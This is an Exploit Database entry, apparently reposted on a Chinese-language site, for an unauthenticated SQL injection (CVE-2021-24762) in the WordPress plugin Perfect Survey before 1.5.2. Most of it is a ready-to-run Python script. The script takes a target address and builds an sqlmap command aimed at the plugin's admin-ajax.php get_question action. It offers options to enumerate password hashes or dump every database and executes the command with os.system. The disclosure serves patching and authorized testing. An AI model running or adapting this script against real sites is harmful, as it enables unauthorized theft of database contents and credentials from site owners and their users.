WordPress Plugin Perfect Survey – 1.5.1 – SQLi (Unauthenticated)

• Exploit Database
• 16 阅读

• 作者： Ron Jost
  日期： 2022-02-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50766/

• # Exploit Title: WordPress Plugin Perfect Survey - 1.5.1 - SQLi (Unauthenticated)
  # Date 18.02.2022
  # Exploit Author: Ron Jost (Hacker5preme)
  # Vendor Homepage: https://www.getperfectsurvey.com/
  # Software Link: https://web.archive.org/web/20210817031040/https://downloads.wordpress.org/plugin/perfect-survey.1.5.1.zip
  # Version: < 1.5.2
  # Tested on: Ubuntu 20.04
  # CVE: CVE-2021-24762
  # CWE: CWE-89
  # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24762/README.md
  
  '''
  Description:
  The Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before
  using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.
  '''
  
  banner = '''
  
   ____ _______ ____ ____ ____ ___ ______________________
   _(___)_ (_) (_)(______)_(____) (____)_(____) (___)_(____)(_)(_)(_______)(_____) _(____) 
  (_) (_)(_) (_)(_)________(_) _(_)(_)(_)(_) _(_)(_)(_) ______(_) _(_)(_)__(_)_ _(_)(_)___(_) _(_) 
  (_)_ (_) (_)(____)(______) _(_)(_)(_)_(_) (_)(______) _(_)(________)_(_)(_____)__(_) 
  (_)___(_) (_)_(_) (_)____ (_)___ (_)__(_) (_)___(_)(_)___(_) (_)(_)___(_)(_)___
  (___)(___)(______) (______) (____) (______) (_) (______) (_)(_)(_____)(______) 
   
   
  								[+] Perfect Survey - SQL Injection
  								[@] Developed by Ron Jost (Hacker5preme)
  
  '''
  print(banner)
  
  import argparse
  from datetime import datetime
  import os
  
  # User-Input:
  my_parser = argparse.ArgumentParser(description= 'Perfect Survey - SQL-Injection (unauthenticated)')
  my_parser.add_argument('-T', '--IP', type=str)
  my_parser.add_argument('-P', '--PORT', type=str)
  my_parser.add_argument('-U', '--PATH', type=str)
  args = my_parser.parse_args()
  target_ip = args.IP
  target_port = args.PORT
  wp_path = args.PATH
  
  print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
  print('[*] Payload for SQL-Injection:')
  exploitcode_url = r'sqlmap "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin-ajax.php?action=get_question&question_id=1 *" '
  print('Sqlmap options:')
  print(' -a, --all Retrieve everything')
  print(' -b, --bannerRetrieve DBMS banner')
  print(' --current-userRetrieve DBMS current user')
  print(' --current-dbRetrieve DBMS current database')
  print(' --passwords Enumerate DBMS users password hashes')
  print(' --tablesEnumerate DBMS database tables')
  print(' --columns Enumerate DBMS database table column')
  print(' --schemaEnumerate DBMS schema')
  print(' --dumpDump DBMS database table entries')
  print(' --dump-allDump all DBMS databases tables entries')
  retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')
  exploitcode = exploitcode_url +retrieve_mode + ' --answers="follow=Y" --batch -v 0'
  os.system(exploitcode)
  print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))